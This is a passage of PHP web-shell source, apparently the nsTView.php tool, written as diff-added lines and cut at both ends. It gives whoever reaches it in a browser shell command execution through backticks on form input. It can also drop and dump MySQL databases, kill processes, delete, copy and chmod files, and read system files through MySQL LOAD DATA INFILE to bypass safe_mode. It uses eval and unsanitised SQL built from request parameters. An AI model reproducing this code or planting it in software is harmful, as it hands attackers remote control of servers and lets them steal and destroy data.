".mysql_error()."</font>"); +if($serv){$status="Connected. :: <a href='$php_self?p=sql'>Log out</a>";}else{$status="Disconnected.";} +print "<b><font color=green>Status: $status<br><br>"; # #D7FFA8 +print "<table cellpadding=0 cellspacing=0 bgcolor=#D7FFA8><tr><td valign=top>"; +print "<br><font color=red>[db]</font><Br>"; +print "<font color=white>"; +$res = mysql_list_dbs($serv); +while ($str=mysql_fetch_row($res)){ +print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&delete_db=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")'>[DEL]<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$str[0]&dump_db=$str[0]&f_d=$d'>[DUMP]</a></a> <b><a href='$php_self?baza=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>"; +$tc++; +} +$baza=$_GET['baza']; +$db=$_GET['db']; +print "<font color=red>[Total db: $tc]</font><br>"; +if($baza){ +print "<div align=left><font color=green>db: [$db]</div></font><br>"; +$result=@mysql_list_tables($db); +while($str=@mysql_fetch_array($result)){ 
+$c=mysql_query ("SELECT COUNT(*) FROM $str[0]"); +$records=mysql_fetch_array($c); + +if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);} +if($records[0]=="0"){ +print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]&ins_new_line=1'>$str[0]</a><br>"; +}else{ +print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>"; +} +mysql_free_result($c); +$total_t++; +} +print "<br><B><font color=red>Total tables: $total_t</font></b>"; + print "<pre>"; +for($i=0; $i<$s4ot+10; $i++){print "&nbsp;";} + print "</pre>"; +} #end baza + + + + +# delete table +if(isset($delete_table)){ +mysql_select_db($_GET['db']) or die("<font color=red>".mysql_error()."</font>"); +mysql_query("DROP TABLE IF EXISTS $delete_table") or die("<font color=red>".mysql_error()."</font>"); +print "<br><b><font color=green>Table [ $delete_table ] :: Deleted success!</font></b>"; +print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1\">"; +} +# end of delete table + +# delete database +if(isset($_GET['delete_db'])){ +mysql_drop_db($_GET['delete_db']) or die("<font 
color=red>".mysql_error()."</font>"); +print "<br><b><font color=green>Database ".$_GET['delete_db']." :: Deleted Success!"; +print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1\">"; +} +# end of delete database + +# delete row +if(isset($_POST['delete_row'])){ +$_POST['delete_row'] = base64_decode($_POST['delete_row']); +mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("<font color=red>".mysql_error()."</font>"); +$del_result = "<br><b><font color=green>Deleted Success!<br>".$_POST['delete_row']; +print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">"; +} +# end of delete row + + +$vn=$_GET['vn']; +print "</td><td valign=top>"; +print "<font color=green>Database: $db => $vn</font>"; + +# edit row +if(isset($_POST['edit_row'])){ +$edit_row=base64_decode($_POST['edit_row']); + +$r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("<font color=red>".mysql_error()."</font>"); +print "<br><br> + <table border=0 cellpadding=1 cellspacing=1><tr> + <td><b>Row</b></td><td><b>Value</b></td></tr>"; +print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."'>"; +print "<input type=hidden name=edit_row value='".$_POST['edit_row']."'>"; +print " <input type=radio name=upd value=update checked>Update<br> + <input type=radio name=upd value=insert>Insert new<br><br>"; + + +$i=0; +while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){ +foreach($mn as $key =>$val){ +$type = mysql_field_type($r_edit, $i); +$len = mysql_field_len($r_edit, $i); +$del .= "`$key`='".adds($val)."' AND "; +$c=strlen($val); +$val=htmlspecialchars($val, ENT_NOQUOTES); +$str=" <textarea name='$key' cols=39 rows=5>$val</textarea> "; +$buff .= "<tr><td 
bgcolor=silver><b>$key</b><br><font color=green>(<b>$type($len)</b>)</font></td><td>$str</td></tr>"; +$i++; +} + +} +$delstring=base64_encode($del); +print "<input type=hidden name=delstring value=\"$delstring\">"; +print "$buff</table><br>"; +print "<br>"; +if(!$_POST['makeupdate']){print "<input type=submit value=Update name=makeupdate></form>";} + + + + +if($_POST['makeupdate']){ +if($_POST['upd']=='update'){ +preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3); +$delstring=$_POST['delstring']; +$delstring=base64_decode($delstring); +$delstring = substr($delstring, 0, strlen($delstring)-5); + +for($i=0; $i<count($matches3[0]); $i++){ +eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";"); +$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',"; +} +$total_str = substr_replace($total_str,"",-1); +$up_string = "UPDATE `$tbl` SET $total_str WHERE $delstring"; +$up_string = htmlspecialchars($up_string, ENT_NOQUOTES); +print "<b>PHP var:<br></b>\$sql=\"$up_string\";<br><br>"; +print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">"; +mysql_query($up_string) or die("<font color=red>".mysql_error()."</font>"); +}#end of make update + + + +if($_POST['upd']=='insert'){ +preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3); +$delstring=$_POST['delstring']; +$delstring=base64_decode($delstring); +$delstring = substr($delstring, 0, strlen($delstring)-5); + +for($i=0; $i<count($matches3[0]); $i++){ +eval("\$".$matches3[1][$i]." 
= \"".adds2($_POST[$matches3[1][$i]])."\";"); +$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,"; +} + +$total_str = ",,".$total_str; + +preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4); + +for($i=0; $i<count($matches4[1]); $i++){ + $matches4[1][0]=str_replace(",","",$matches4[1][0]); + $total_m_i .= "`".$matches4[1][$i]."`,"; + $total_m_x .= "'".$matches4[2][$i]."',"; +} +$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1); +$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1); + +$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)"; +mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>"); +print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>"; +print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">"; +}#end of insert +}#end of update +} +# end of edit row + + +# insert new line +if($_GET['ins_new_line']){ +$qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("<font color=red>".mysql_error()."</font>"); +print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."&ins_new_line=1'> +Insert new line in <b>$tbl</b> table</b><Br><br>"; +print "<table>"; +while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) { +foreach ($new_line as $key =>$next) { +$buff .= "$next "; +} +$expl=explode(" ",$buff); +$buff2 .= $expl[0]." "; +print "<tr><td bgcolor=silver><b>$expl[0]</b><br><font color=green>(<b>$expl[1]</b>)</font></td> +<td><textarea name='$expl[0]' cols=39 rows=5></textarea> +</td></tr>"; +unset($buff); +} +print "</table> +<center><input type=submit value=Insert name=mk_ins></form></center>"; +if($_POST['mk_ins']){ +preg_match_all("/(.*?)\s/i",$buff2,$matches3); +for($i=0; $i<count($matches3[0]); $i++){ +eval("\$".$matches3[1][$i]." 
= \"".adds2($_POST[$matches3[1][$i]])."\";"); +$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,"; +} + +$total_str = ",,".$total_str; +preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4); + +for($i=0; $i<count($matches4[1]); $i++){ + $matches4[1][0]=str_replace(",","",$matches4[1][0]); + $total_m_i .= "`".$matches4[1][$i]."`,"; + $total_m_x .= "'".$matches4[2][$i]."',"; +} +$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1); +$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1); + +$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)"; +mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>"); +print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>"; +print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">"; +}#end of mk ins +}#end of ins new line + + + + + + +if(isset($_GET['rename_table'])){ +$rename_table=$_GET['rename_table']; +print "<br><br>Rename <b>$rename_table</b> to<br><br> +<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$rename_table'> +<input name=new_name size=30><center><br> +<input type=submit value=Rename></center> +</form> +"; + +if(isset($_POST['new_name'])){ +mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>"); +mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("<font color=red>".mysql_error()."</font>"); +print "<br><font color=green>Table <b>$rename_table</b> renamed to <b>".$_POST['new_name']."</b></font>"; +print "<meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&db=$db\">"; +} + +}#end of rename + + +# dump table +if($_GET['dump']){ +if(!is_writable($f_d)){die("<br><br><font color=red>This folder $f_d isnt writable!<br>Cannot make dump.<br><br> +<font color=green><b>You can change temp 
folder for dump file in your browser!<br> +<font color=red>Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)</font><br> +Then press enter</b></font> +</font>");} +mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>"); +$fp = fopen($f_d."/".$f,"w"); +fwrite($fp, "# nsTView.php v$ver +# Web: http://nst.void.ru +# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].") +# MySQL version: ".mysql_get_server_info()." +# PHP version: ".phpversion()." +# Date: ".date("d.m.Y - H:i:s")." +# Dump db ( $db ) Table ( $tbl ) +# --- eof --- + +"); +$que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("<font color=red>".mysql_error()."</font>"); +$row = mysql_fetch_row($que); +fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n"); +$row[1]=str_replace("\n","\r\n",$row[1]); +fwrite($fp, $row[1].";\r\n\r\n"); +$que = mysql_query("SELECT * FROM `$tbl`"); +if(mysql_num_rows($que)>0){ +while($row = mysql_fetch_assoc($que)){ +$keys = join("`, `", array_keys($row)); +$values = array_values($row); +foreach($values as $k=>$v) {$values[$k] = adds2($v);} +$values = implode("', '", $values); +$sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n"; +fwrite($fp, $sql); +} +} +fclose($fp); +print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">"; +}#end of dump + + + + +# db dump +if($_GET['dump_db']){ +$c=mysql_num_rows(mysql_list_tables($db)); +if($c>=1){ +print "<br><br>&nbsp;&nbsp;&nbsp;Dump database <b>$db</b>"; +}else{ +print "<br><br><font color=red>Cannot dump database. No tables exists in <b>$db</b> db.</font>"; +die; +} +if(sizeof($tabs)==0){ +$res = mysql_query("SHOW TABLES FROM $db"); +if(mysql_num_rows($res)>0){ +while($row=mysql_fetch_row($res)){ +$tabs[] .= $row[0]; +} +} +} +$fp = fopen($f_d."/".$f,"w"); +fwrite($fp, "# nsTView.php v$ver +# Web: http://nst.void.ru +# Dump from: ".$_SERVER["SERVER_NAME"]." 
(".$_SERVER["SERVER_ADDR"].") +# MySQL version: ".mysql_get_server_info()." +# PHP version: ".phpversion()." +# Date: ".date("d.m.Y - H:i:s")." +# Dump db ( $db ) +# --- eof --- + +"); +foreach($tabs as $tab) { +fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n"); +$res = mysql_query("SHOW CREATE TABLE `$tab`"); +$row = mysql_fetch_row($res); +$row[1]=str_replace("\n","\r\n",$row[1]); +fwrite($fp, $row[1].";\r\n\r\n"); +$res = mysql_query("SELECT * FROM `$tab`"); +if(mysql_num_rows($res)>0){ +while($row=mysql_fetch_assoc($res)){ +$keys = join("`, `", array_keys($row)); +$values = array_values($row); +foreach($values as $k=>$v) {$values[$k] = adds2($v);} +$values = join("', '", $values); +$sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n"; +fwrite($fp, $sql); +}} +fwrite($fp, "\r\n\r\n\r\n"); +} +fclose($fp); +print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">"; +}#end of db dump + + + + + + +$vnutr=$_GET['vnutr']; +$tbl=$_GET['tbl']; +if($vnutr and !$_GET['ins_new_line']){ +print "<table cellpadding=0 cellspacing=1><tr><td>"; + +mysql_select_db($db) or die(mysql_error()); +$c=mysql_query ("SELECT COUNT(*) FROM $tbl"); +$cfa=mysql_fetch_array($c); +mysql_free_result($c); +print " +Total: $cfa[0] +<form> +From: <input name=from size=3 value=0> +To: <input name=to size=3 value='$cfa[0]'> +<input type=submit name=show value=Show> +<input type=hidden name=vnutr value=1> +<input type=hidden name=vn value='$vn'> +<input type=hidden name=db value='$db'> +<input type=hidden name=login value='$login'> +<input type=hidden name=pass value='$pass'> +<input type=hidden name=adress value='$adress'> +<input type=hidden name=conn value=1> +<input type=hidden name=baza value=1> +<input type=hidden name=p value=sql> +<input type=hidden name=tbl value='$tbl'> + [<a 
href='$php_self?getdb=1&to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl'>DOWNLOAD</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&ins_new_line=1'>INSERT</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&dump=1&f_d=$d'>DUMP</a>] +</form></td></tr></table>"; +$vn=$_GET['vn']; +$from=$_GET['from']; +$to=$_GET['to']; +$from=$_GET['from']; +$to=$_GET['to']; +if(!isset($from)){$from=0;} +if(!isset($to)){$to=50;} +$query = "SELECT * FROM $vn LIMIT $from,$to"; +$result = mysql_query($query); +$result1= mysql_query($query); +print $del_result; +print "<table cellpadding=0 cellspacing=1 border=1><tr><td></td>"; +for ($i=0;$i<mysql_num_fields($result);$i++){ +$name=mysql_field_name($result,$i); +$type = mysql_field_type($result, $i); +$len = mysql_field_len($result, $i); +print "<td bgcolor=#BCE0FF> $name (<b>$type($len)</b>)</td>"; +} +print "</tr><pre>"; + +while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){ +foreach($mn as $key=>$inside){ +$buffer1 .= "`$key`='".adds($inside)."' AND "; +$b1 .= "<td>".htmlspecialchars($inside, ENT_NOQUOTES)."&nbsp;</td>"; +} +$buffer1 = substr($buffer1, 0, strlen($buffer1)-5); +$buffer1 = base64_encode($buffer1); +print "<td> +<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&vnutr=1&baza=1&vn=$vn&db=$db'> +<input type=hidden name=delete_row value='$buffer1'> +<input type=submit value=Del onclick='return confirm(\"DELETE ?\")' style='border:1px; background-color:white;'> +</form><form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&baza=1&vn=$vn&db=$db'> +<input type=hidden name=edit_row value='$buffer1'> +<input type=submit value=Edit style='border:1px;background-color:green;'> +</form> +</td>\r\n"; +print $b1; +print "</tr>"; +unset($b1); 
+unset($buffer1); +} + + + +mysql_free_result($result); +print "</table>"; +} #end vnutr +print "</td></tr></table>"; +} # end $conn + + +### end of sql +print "</tr></td></table> </td></tr></table>"; +print $copyr; +die; +} + + +@$p=$_GET['p']; +if(@$_GET['p']=="selfremover"){ + print "<tr><td>"; +print "<font color=red face=verdana size=1>Are you sure?<br> +<a href='$php_self?p=yes'>Yes</a> | <a href='$php_self?'>No</a><br> +Remove: <u>"; +$path=__FILE__; +print $path; +print " </u>?</td></tr></table>"; +die; +} + +if($p=="yes"){ +$path=__FILE__; +@unlink($path); +$path=str_replace("\\","/",$path); +if(file_exists($path)){$hmm="NOT DELETED!!!"; +print "<tr><td><font color=red>FILE $path NOT DELETED</td></tr>"; +}else{$hmm="DELETED";} +print "<script>alert('$path $hmm');</script>"; + +} + + + +if($os=="unix"){ +function fastcmd(){ +global $fast_commands; +$c_f=explode("\n",$fast_commands); +$c_f=count($c_f)-2; +print " +<form method=post> +Total commands: $c_f<br> +<select name=sh3>"; + +$c=substr_count($fast_commands," (nst) "); +for($i=0; $i<=$c; $i++){ + $expl2=explode("\r\n",$fast_commands); + $expl=explode(" (nst) ",$expl2[$i]); + if(trim($expl[1])!=""){ + print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n"; + } +} + +print "</select><br> +<input type=submit value=Exec> +</form> +"; +} +}#end of os unix + + +if($os=="win"){ +function fastcmd(){ +global $fast_commands_win; +$c_f=explode("\n",$fast_commands_win); +$c_f=count($c_f)-2; +print " +<form method=post> +Total commands: $c_f<br> +<select name=sh3>"; + +$c=substr_count($fast_commands_win," (nst) "); +for($i=0; $i<=$c; $i++){ + $expl2=explode("\r\n",$fast_commands_win); + $expl=explode(" (nst) ",$expl2[$i]); + if(trim($expl[1])!=""){ + print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n"; + } +} + +print "</select><br> +<input type=submit value=Exec> +</form> +"; +} +}#end of os win + + +echo " +<tr><td>"; +if(@$_GET['sh311']=="1"){echo "<center>cmd<br>pwd: +"; +chdir($d); +echo 
getcwd()."<br><br> +Fast cmd:<br>"; +fastcmd(); +if($os=="win"){$d=str_replace("/","\\\\",$d);} +print " +<a href=\"javascript:cwd('$d ')\">Insert pwd</a> +<form name=sh311Form method=post><input name=sh3 size=110></form></center><br> +"; +if(@$_POST['sh3']){ +$sh3=$_POST['sh3']; +echo "<pre>"; +print `$sh3`; +echo "</pre>"; +} +} + +if(@$_GET['sh311']=="2"){ +echo "<center>cmd<br> +pwd: +"; +chdir($d); +echo getcwd()."<br><br> +Fast cmd:<br>"; +fastcmd(); +if($os=="win"){$d=str_replace("/","\\\\",$d);} +print " +<a href=\"javascript:cwd('$d ')\">Insert pwd</a> +<form name=sh311Form method=post><input name=sh3 size=110></form></center><br>"; +if(@$_POST['sh3']){ +$sh3=$_POST['sh3']; +echo "<pre>"; print `$sh3`; echo "</pre>";} +echo $copyr; +exit;} + +if(@$_GET['delfl']){ +@$delfolder=$_GET['delfolder']; +echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br> +(All files must be writable)<br> +<a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?d=$d'>No</a><br><br> +"; +echo $copyr; +exit; +} + + +$mkdir=$_GET['mkdir']; +if($mkdir){ +print "<br><b>Create Folder in $d :</b><br><br> +<form method=post> +New folder name:<br> +<input name=dir_n size=30> +</form><br> +"; +if($_POST['dir_n']){ +mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']); +print "<b><font color=green>Directory created success!</font></b>"; +} +print $copyr; +die; +} + + +$mkfile=$_GET['mkfile']; +if($mkfile){ +print "<br><b>Create file in $d :</b><br><br> +<form method=post> +File name:<br> +(example: hello.txt , hello.php)<br> +<input name=file_n size=30> +</form><br> +"; +if($_POST['file_n']){ +$fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']); +fwrite($fp,""); +print "<b><font color=green>File created success!</font></b>"; +} +print $copyr; +die; +} + + +$ps_table=$_GET['ps_table']; +if($ps_table){ + +if($_POST['kill_p']){ +exec("kill -9 ".$_POST['kill_p']); +} 
+ +$str=`ps aux`; + +# You can put here preg_match_all for other distrib/os +preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches); + + +print "<br><b>PS Table :: Fast kill program<br> +(p.s: Tested on Linux slackware 10.0)<br> +<br></b>"; +print "<center><table border=1>"; +for($i=0; $i<count($matches[3]); $i++){ +$expl=explode(" ",$matches[0][$i]); +print "<tr><td>$expl[0]</td><td>PID: ".$matches[1][$i]." :: ".$matches[3][$i]."</td><form method=post><td><font color=red>Kill: <input type=submit name=kill_p value=".trim($matches[1][$i])."></td></form></tr>"; +}#end of for +print "</table></center><br><br>"; +unset($str); +print $copyr; +die; +}#end of ps table + + +$read_file_safe_mode=$_GET['read_file_safe_mode']; +if($read_file_safe_mode){ + +if(!isset($_POST['l'])){$_POST['l']="root";} + +print "<br> +Read file content using MySQL - when <b>safe_mode</b>, <b>open_basedir</b> is <font color=green>ON</font><Br> +<form method=post> +<table> +<tr><td>Addr:</td><Td> <input name=serv_ip value='127.0.0.1'><input name=port value='3306' size=6></td></tr> +<tr><td>Login:</td><td><input name=l value=".$_POST['l']."></td></tr> +<tr><td>Passw:</td><td><input name=p value=".$_POST['p']."></td></tr></table> +(example: /etc/hosts)<br> +<input name=read_file size=45><br> +<input type=submit value='Show content'> +</form> +<br>"; + +if($_POST['read_file']){ +$read_file=$_POST['read_file']; +@mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("<font color=red>".mysql_error()."</font>"); +mysql_create_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>"); +mysql_select_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>"); +mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("<font color=red>".mysql_error()."</font>"); +mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file"); +$query = "SELECT * FROM tmp_file"; +$result = 
mysql_query($query) or die("<font color=red>".mysql_error()."</font>"); +print "<b>File content</b>:<br><br>"; +for($i=0;$i<mysql_num_fields($result);$i++){ +$name=mysql_field_name($result,$i);} +while($line=mysql_fetch_array($result, MYSQL_ASSOC)){ +foreach ($line as $key =>$col_value) { +print htmlspecialchars($col_value)."<br>";}} +mysql_free_result($result); +mysql_drop_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>"); +} + + +print $copyr; +die; +}#end of read_file_safe_mode + + +# sys +$wich_f=$_GET['wich_f']; +$delete=$_GET['delete']; +$del_f=$_GET['del_f']; +$chmod=$_GET['chmod']; +$ccopy_to=$_GET['ccopy_to']; + + +# delete +if(@$_GET['del_f']){ +if(!isset($delete)){ +print "<font color=red>Delete this file?</font><br> +<b>$d/$wich_f<br><br></b> +<a href='$php_self?d=$d&del_f=$wich_f&delete=1'>Yes</a> / <a href='$php_self?d=$d'>No</a> +";} +if($delete==1){ +unlink($d."/".$del_f); +print "<b>File: <font color=green>$d/$del_f DELETED!</font></b> +<br><b> <a href='$php_self?d=$d'># BACK</a> +"; +} +echo $copyr; +exit; +} + + +# copy to +if($ccopy_to){ +$wich_f=$_POST['wich_f']; +$to_f=$_POST['to_f']; +print "<font color=green>Copy file:<br> +$d/$ccopy_to</font><br> +<br> +<form method=post> +File:<br><input name=wich_f size=100 value='$d/$ccopy_to'><br><br> +To:<br><input name=to_f size=100 value='$d/nst_$ccopy_to'><br><br> +<input type=submit value=Copy></form><br><br> +"; + +if($to_f){ +@copy($wich_f,$to_f) or die("<font color=red>Cannot copy!!! 
maybe folder is not writable</font>"); +print "<font color=green><b>Copy success!!!</b></font><br>"; +} + +echo $copyr; +exit; +} + + +# chmod +if(@$_GET['chmod']){ +$perms = @fileperms($d."/".$wich_f); +print "<b><font color=green>CHMOD file $d/$wich_f</font><br> +<br><center>This file chmod is</b> "; +print perm($perms); +print "</center> +<br>"; +$chmd=<<<HTML + +<script> +<!-- + +function do_chmod(user) { + var field4 = user + "4"; + var field2 = user + "2"; + var field1 = user + "1"; + var total = "t_" + user; + var symbolic = "sym_" + user; + var number = 0; + var sym_string = ""; + + if (document.chmod[field4].checked == true) { number += 4; } + if (document.chmod[field2].checked == true) { number += 2; } + if (document.chmod[field1].checked == true) { number += 1; } + + if (document.chmod[field4].checked == true) { + sym_string += "r"; + } else { + sym_string += "-"; + } + if (document.chmod[field2].checked == true) { + sym_string += "w"; + } else { + sym_string += "-"; + } + if (document.chmod[field1].checked == true) { + sym_string += "x"; + } else { + sym_string += "-"; + } + + if (number == 0) { number = ""; } + document.chmod[total].value = number; + document.chmod[symbolic].value = sym_string; + + document.chmod.t_total.value = document.chmod.t_owner.value + document.chmod.t_group.value + document.chmod.t_other.value; + document.chmod.sym_total.value = "-" + document.chmod.sym_owner.value + document.chmod.sym_group.value + document.chmod.sym_other.value; +} +//--> +</script> + + + +<form name="chmod" method=post> +<p><table cellpadding="0" cellspacing="0" border="0" bgcolor="silver"><tr><td width="100%" valign="top"><table width="100%" cellpadding="5" cellspacing="2" border="0"><tr><td width="100%" bgcolor="#008000" align="center" colspan="5"><font color="#ffffff" size="3"><b>CHMOD (File Permissions)</b></font></td></tr> + <tr bgcolor="gray"> + <td align="left"><b>Permission</b></td> + <td align="center"><b>Owner</b></td> + <td 
align="center"><b>Group</b></td> + <td align="center"><b>Other</b></td> + <td bgcolor="#dddddd" rowspan="4"> </td> + </tr><tr bgcolor="#dddddd"> + <td align="left" nowrap><b>Read</b></td> + <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner4" value="4" onclick="do_chmod('owner')"></td> + <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group4" value="4" onclick="do_chmod('group')"></td> + <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other4" value="4" onclick="do_chmod('other')"></td> + </tr><tr bgcolor="#dddddd"> + <td align="left" nowrap><b>Write</b></td> + <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner2" value="2" onclick="do_chmod('owner')"></td> + <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group2" value="2" onclick="do_chmod('group')"></td> + <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other2" value="2" onclick="do_chmod('other')"></td> + </tr><tr bgcolor="#dddddd"> + <td align="left" nowrap><b>Execute</b></td> + <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner1" value="1" onclick="do_chmod('owner')"></td> + <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group1" value="1" onclick="do_chmod('group')"></td> + <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other1" value="1" onclick="do_chmod('other')"></td> + </tr><tr bgcolor="#dddddd"> + <td align="right" nowrap>Octal:</td> + <td align="center"><input type="text" name="t_owner" value="" size="1"></td> + <td align="center"><input type="text" name="t_group" value="" size="1"></td> + <td align="center"><input type="text" name="t_other" value="" size="1"></td> + <td align="left"><b>=</b> <input type="text" name="t_total" value="777" size="3"></td> + </tr><tr bgcolor="#dddddd"> + <td align="right" nowrap>Symbolic:</td> + <td align="center"><input type="text" name="sym_owner" value="" size="3"></td> + <td align="center"><input 
